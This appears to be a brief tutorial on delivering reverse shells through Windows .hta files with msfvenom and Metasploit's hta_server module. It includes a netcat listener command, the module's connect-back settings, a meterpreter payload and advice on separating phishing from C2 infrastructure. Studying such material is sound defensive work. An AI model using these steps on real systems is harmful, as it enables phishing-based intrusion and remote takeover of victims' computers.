Windows “HTML Applications” are just HTML files (with the .hta extension) containing JavaScript of VBScript. These are interpreted using the mshta.exe binary; IE and Edge will both helpfully offer to run these files after they’re downloaded.
A simple example that pops a command prompt:
Create malicious HTA files using Metasploit
Exploit Windows HTML applications with msfvenom
msfvenom can be used to generate HTA refer shells.
Catch with the standard
nc -lvp $ATTACKER_PORT
netcat command.Metasploit can do all of this automatically for us via
exploit/windows/misc/hta_server
. Critical variables to set:
LHOST
— the host IP address to connect back toLPORT
— the port to connect back toSRVHOST
— the host IP address to serve the malicious file onpayload
— the Metasploit payload to useIn quick-and-dirty cases LHOST and SRVHOST will be the same, though in more sophisticated operations (i.e., if you’re separating phishing and C2 IPs) they will be different. The payload variable is particularly useful, as you can use something like
windows/meterpreter/reverse_tcp
and get a meterpreter shell, rather than just a plain reverse shell!Note that you may have to hit “Return” once the file is served to get back to the Metasploit prompt.
Link to original